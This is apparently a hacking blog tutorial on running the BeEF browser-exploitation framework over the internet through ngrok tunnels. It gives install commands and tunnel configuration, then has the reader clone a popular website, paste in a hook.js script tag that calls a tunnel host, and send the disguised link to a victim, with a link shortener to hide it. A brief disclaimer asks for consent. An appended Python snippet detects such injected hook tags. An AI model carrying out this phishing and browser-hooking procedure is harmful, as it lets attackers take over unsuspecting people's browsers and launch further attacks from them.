Beef-xss over wan with custom page

Hi and welcome to Hacking a rise. Today we are going to be using the beef-over-wan script, which will let us use our beef-xss over the internet.

What is BeEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. … BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

What is ngrok

Ngrok is a multiplatform tunnelling and reverse proxy tool that establishes secure tunnels from a public endpoint, such as the internet, to a locally running network service, while capturing all traffic for detailed inspection and replay.

What is beef-over-wan

Browser Exploitation Framework is an open-source penetration testing tool that focuses on browser-based vulnerabilities. This Python script makes the changes required to make the hooked link accessible over WAN, so anyone can use this framework and attack over WAN without port forwarding [NGROK or any localhost-to-webhost service required].

Installing

git clone https://github.com/stormshadow07/BeeF-Over-Wan.git
cd BeeF-Over-Wan
chmod +x BeeFOverWan.py && python BeeFOverWan.py

NGROK Steps
STEP 1 : Add these Lines To ngrok.yml [Location .ngrok2/ngrok.yml ]
tunnels:
  first-app:
    addr: 80
    proto: http
  second-app:
    addr: 3000
    proto: http
STEP 2 : Now Start ngrok with :
ngrok start --all
STEP 3 : You will See 2 different links Forwarded to
Localhost:80 [ Link To be Sent to Victim ]
Localhost:3000 [ Your Link will be Connecting to.. ]
STEP 4 : Enter these links in Script and Follow The Steps given in Script.

Requirements
Beef-xss [Browser Exploitation Framework]
Apache
NGROK [If you want to do this without Port Forwarding]

Right, now that we've got that out of the way we can start Beef-over-wan. Open a terminal and type ngrok start --all

Now we start beef-over-wan and the apache2 server. Open a terminal and type service apache2 start, then cd BeeF-Over-Wan, and then python BeeFOverWan.py

Now we press 0 and then Enter. This will show us the ngrok settings, in case you didn't already set them.

Now we hit Enter and it asks us to give the ngrok link we want to send to the target, so we use the one that's running on port 80. In my case it's 2504e17a.ngrok.io, so I copy it without the http, paste it into the terminal and hit Enter.

Now we add the URL for the panel to connect to, which is the URL running on port 3000. In my case it's 7a77ef5a.ngrok.io, so we copy and paste it in.

Now wait a few seconds and you will see this pop up.

Now copy the link for the panel and paste it into Firefox. My link is https://7a77ef5a.ngrok.io/ui/authentication. This takes you to the login page of beef-xss.

Now we log in. The default username and password are both beef. When you log in you are greeted with this page.

Now we minimize the beef-xss panel and open two terminals. In both, type cd /var/www/html. In one of them, type nano beef.html and copy in this script:

<script src="http://2504e17a.ngrok.io:80/hook.js"></script>

Now in the other terminal, type wget and the URL you want to clone. For this I'm going to use pornhub.com, as it's the porn site people stay on the most, so it gives us more chance of keeping them hooked.

Now we type ls and gedit index.html

It will open the index file in a text editor, and we paste the script under the title in the file:

<script src="http://2504e17a.ngrok.io:80/hook.js"></script>

Now we send this URL, http://2504e17a.ngrok.io, to the target, and when they click it they are hooked.

Now we can start running commands on the target's browser, but personally I would rather use a link shortener like Bitly.
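
Seen from the defending side, the tag this walkthrough pastes into the cloned page is a simple indicator: a script named hook.js loaded from an ngrok.io host. The Python below is an added example, not part of the original post or of the BeeF-Over-Wan script; the function names, the sample page and the host www.example.com are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicators taken from this walkthrough; extend them for your environment.
HOOK_FILENAMES = {"hook.js"}      # script name used in the injected tag
TUNNEL_SUFFIXES = (".ngrok.io",)  # tunnel domain used on this page

class ScriptCollector(HTMLParser):
    """Collect the src of every <script> tag, tolerating sloppy markup."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")  # None for inline or valueless src
        if tag == "script" and src:
            self.sources.append(src.strip())

def reasons_for(src, page_host):
    """Return why a script URL resembles the hook tag, or [] if it does not."""
    url = urlparse(src)
    host = (url.hostname or page_host).lower()  # relative src = same host
    name = url.path.rsplit("/", 1)[-1].lower()
    reasons = []
    if name in HOOK_FILENAMES:
        reasons.append("hook filename")
    if host.endswith(TUNNEL_SUFFIXES):
        reasons.append("tunnel host")
    if reasons and host != page_host.lower():
        reasons.append("loaded cross-origin")
    return reasons

def find_hook_scripts(html, page_host):
    """Scan one HTML document; return [(src, reasons)] for suspicious scripts."""
    collector = ScriptCollector()
    collector.feed(html)
    hits = [(s, reasons_for(s, page_host)) for s in collector.sources]
    return [(s, r) for s, r in hits if r]

# Constructed sample: a cloned page with the walkthrough's tag under <title>.
SAMPLE = """<html><head><title>Example</title>
<SCRIPT SRC="http://2504e17a.ngrok.io:80/hook.js"></SCRIPT>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib/jquery.min.js"></script>
</head><body>hello</body></html>"""

if __name__ == "__main__":
    for src, why in find_hook_scripts(SAMPLE, "www.example.com"):
        print(f"{src}: {', '.join(why)}")
```

A filename match on its own is a weak signal, since the name and host are both easy to change, so treat hits as leads for review rather than verdicts.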

Disclaimer

Don't use this for evil. In other words, don't use this without the person's consent, as I don't take responsibility for your actions.

pentester
Hi, I'm the laughing man. I'm a pentester and the owner of Hacking a rise.
